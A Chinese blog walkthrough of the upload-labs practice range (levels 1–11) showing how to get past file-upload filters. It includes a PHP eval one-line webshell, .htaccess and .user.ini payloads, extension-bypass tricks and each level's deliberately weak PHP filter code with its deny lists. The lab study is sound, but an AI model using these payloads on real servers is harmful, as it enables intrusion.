有点不知道这篇文算是 ctf 还是攻防了,不过都是一家子的事,无所谓了,两个都算上(
面试被问到文件上传的一些利用思路,bypass 技巧…
死去的记忆在脑海里死的透透的
这篇笔记是很久以前做的了,现在被问起来一些细节…emm好久没用过的东西全都忘却了
现在重发一下,自己也看一遍来做个大记忆恢复术(
网上也有很多师傅做了这个靶场的通关记录,鄙人不才也做一下自己的笔记(*^_^*)
本篇为Pass-1到Pass-11
注意!
本题原生安装完的本地环境有点小问题,可能会影响某些题目的操作,按下面步骤即可解决
小皮里面设置,选配置文件,找到Apache的httpd.conf,里面加上下面一段:
AddType application/x-httpd-php .php .phtml .phps .php5 .pht
不配置是无法解析php5代码的
改完记得重启小皮~
靶场安装以及小皮使用就不多赘述
每关完成通关后记得清理上传文件!!
似乎存在多个不同版本的uploads靶场,而且不同版本的题目配置,绕过姿势都不太一样,俺会把我搜集来的不同版本涉及到的不同思路姿势都写进去(哪怕它在我的靶场环境复现不了),毕竟学到一个技巧在实战用上之前谁都不知道会不会用得上
PHP一句话木马
还是防止有人不知道,简短说一下
<?php
@eval($_POST['rice']);
?>一句话,通过$_POST超全局变量和eval函数直接形成马子,配合菜刀蚁剑等工具可直接冲掉目标
文件上传目标就是要把我们带有木马的文件上传给服务端
Pass-01
一种验证姿势+两种绕过姿势
直接写一个phpma.php(命名随意),形如一句话木马,试着直接上传
马奇诺防线js分线
发现弹出提示(js)这就是纯前端js过滤了,纯纯马奇诺防线
绕过很简单,先说第一种
抓包改包直接绕后
改后缀为.jpg,使得我们的马在验证时变为合法文件,但是开启抓包
在包即将发出还没发出但已经经过js过滤之后的时候,给他改掉,改为.php拓展名,这样后端没有验证的话,就会老老实实的当作php文件,目的达成
擒贼先擒王
直接禁用js就完事了,什么花里胡哨的
上传成不成功?
测试一下呗(拿蚁剑连一下自己也行)
对rice测试post一个phpinfo,可以成功
至于怎么找到自己传的马在哪?
本地环境可以直接翻目录(
当然是在回显页面的源码辣
(测试是否成功的url有两个\upload是因为我靶场站点没在小皮的www里面,我多加了一层目录也叫upload)
pass-01显示源码如下
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}Pass-02
一种验证方法+一种绕过姿势
故技重施失败(废话),看看数据报也看不出来啥啊
看看源码分析一下就可以发现验证姿势了
验证MIME
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif'))分析源码得出本关验证文件类型(MIME)
那直接改数据报就完事了
验证啥就改啥
bp开拦截Content-Type字段改为image/jpg(其他两个也行)再直接Forward就直接通过了
就不每关都演示一遍上传效果了,反正同样的马传上去同一个位置效果都一样(
pass-02显示源码如下
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}Pass-03
直接上源码分析(哪有那么多黑盒就能认出来的特征啊)
黑名单过滤
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空重点在这段,黑名单拉了四个.asp .aspx .php .jsp,然后进行操作
超出三界之外
这种小学生一样的黑名单压根不用想怎么能让文件名活过验证,直接绕后,来个.phtml就老实了
.phtml .pht .phtm .phps .php1 .php2 .php3 .php4 .php5 .php6 .php7 都行but!注意源码里面下面
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;全是随机的找不到咱的马放哪了怎么办?
这里在数据报回显里面有,但是实战场景不一定了哈(
Pass-03显示源码如下
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}Pass-04
最黑的黑名单
康康源码,我嘞个大满贯
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
$file_name = trim($_FILES['upload_file']['name']);上一关的技巧不好使了(
那就不能在文件名上死磕了
htaccess氏三角杀
基本上所有未过滤.htaccess 的黑名单都可以用此方法通杀
那么.htaccess是啥捏,贴一段粘来的讲解
.htaccess是一个纯文本文件,它里面存放着Apache服务器配置相关的指令。
.htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。
.htaccess的用途范围主要针对当前目录。MIME类型配置是吧,直接先上传一个.htaccess,再传一个带马图片,让.htaccess去指导后端把图片当作php解析,成功上传马
方法一:
<FilesMatch "phpma.png">
SetHandler application/x-httpd-php
</FilesMatch>//如果当前目录下有4.png,就会被解析为.php
方法二:
AddType application/x-httpd-php .png//如果当前目录下有以.png结尾的文件,就会被解析为.php
传上去再把我们后缀png的马传上去就ok了
其他版本可能的方法
后缀名改为.php. .
因为源码没有循环验证,也就是说这些收尾去空,删除末尾的点,去除字符串::$DATA,转换为小写这些只验证一次。所以我们的绕过思路就很简单,在数据包中把后缀名改为.php. .
验证过程:首先他发现有一个点,这时会把他去掉,又发现有一个空格,也会把它去掉,我们这时还有一个点,也就是.php. 由于他只是验证一次,所以不会在去掉我们的点,这时就可以上传成功,也可以解析成功。
此法若可行,第五关也通杀,但我的靶场环境会显示上传出错,记下来这个挺好的思路以备不时之需吧
Pass-04显示源码如下:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}Pass-05
把这个放到第九关多好呢,感觉顺序不是很合理
没有最黑只有更黑
上传个.htaccess试试故技重施,发现不行
连这都过滤了,没招了
查看源码也没有任何特殊的信息
这就是我们和.user.ini热血沸腾的组合技!
提示说到,上传的文件目录里面有个readme.php,那能有什么方法利用呢(主要还是得感想没过滤.ini
.user.ini也是php的配置文件,与php.ini不同,那是全局配置,对整个web服务生效
而.user.ini是用户自写的配置文件,对单个目录生效
贴一段百度来的标准回答(
user.ini : 自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被
CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用 Apache,则用
.htaccess 文件有同样效果。
除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web
根目录($_SERVER['DOCUMENT_ROOT'] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。
在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI
设置可被识别。
两个新的 INI 指令,user_ini.filename 和 user_ini.cache_ttl 控制着用户 INI 文件的使用。
user_ini.filename 设定了 PHP 会在每个目录下搜寻的文件名;如果设定为空字符串则 PHP 不会搜寻。默认值是
.user.ini。
※ user_ini.cache_ttl 控制着重新读取用户 INI 文件的间隔时间。默认是 300 秒(5 分钟)。※.user.ini 配置项中有两个配置可以起到一些作用
方法一:
auto_prepend_file = 文件名 //包含在文件头
方法二:
auto_append_file = 文件名 //包含在文件尾.user.ini 的使用范围很广,不仅限于Apache服务器,同样适用于Nginx服务器,只要服务器启用了fastcgi
所以综上,此技巧想要生效(.user.ini生效)要满足三个条件
- 服务器脚本语言为php
- 服务器使用CGI/FastCGI模式
- 上传目录下要有可执行的php文件
正式操作吧,创建.user.ini文件,写入如下
auto_prepend_file = phpma.jpg意思是所有的php文件都自动包含phpma.jpg文件
phpma.jpg里面的内容
<?php
@eval($_POST['rice']);
?>然后就是呃,得等5分钟(上面所说的默认300秒嘛)去个厕所喝口水看会手机什么的
时间到了直接拿蚁剑连readme.php就能搞定
其他版本可能的方法
有些版本的第五题删去了转小写的代码,就可以利用构造拓展名为.Php这种样子来绕过(Linux在没特殊配置的情况下,只有win能这么操作,因为Linux严格区分大小写)
Pass-05显示源码如下:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}Pass-06
大小不分
本关取消了对大小写的转换验证,只需要将.php改为.Php就能直接绕过
但是貌似不能拿hackebar测试了,只能拿蚁剑连,蚁剑连本机可能会出现问题,配置个代理就可以了
Pass-06显示源码如下:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}Pass-07
补药小瞧空格口牙
本关取消了trim()删空格,直接抓包给后缀改成.php ←这有个空格 就可以绕过了
测试还是直接蚁剑连上去就可以测试成功
Pass-07显示源码如下
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}Pass-08
小点点
这关没过滤后缀名最后的点
直接加个点,.php.就搞定了
//后面几关比第五关水多了
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}Pass-09
::$DATA的抛瓦
这关又没进行 ::$DATA 的过滤
那么 ::$DATA 是啥捏,
Windows 系统下(NTFS)会把 ::$DATA 后的文件当作文件数据流,如果上传一个rice.php::$DATA的话,并不会对其进行后缀名检验(识别为数据流)而上传后再解析时还是会做.php解析
那咱直接phpma.php::$DATA 就绕过了
Pass-09显示源码如下
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}Pass-10
这关把过滤手段凑齐了,htaccess和ini也拉黑了,这可如何是好
套路中的套路
单次检验过滤杀掉我们的后缀,但是只杀一次还是太软弱无力了
构造后缀名.php. . (在Pass-04分析过了)
Pass-10显示源码如下
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}Pass-11
这关跟sql注入那边的技巧有共通之处
文件上传疑似有点城市化了
他会把黑名单里面所有的后缀全都直接删掉,全豆沙了
之前使用过的一些技巧都不好使了
他出了一个名刀司命
还是老样子,只杀一次,我直接来波双写,你能秒杀我?
.php双写成.pphphp,杀一次以后变成.php成功存活
Pass-11显示源码如下
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
米饭大神!!!!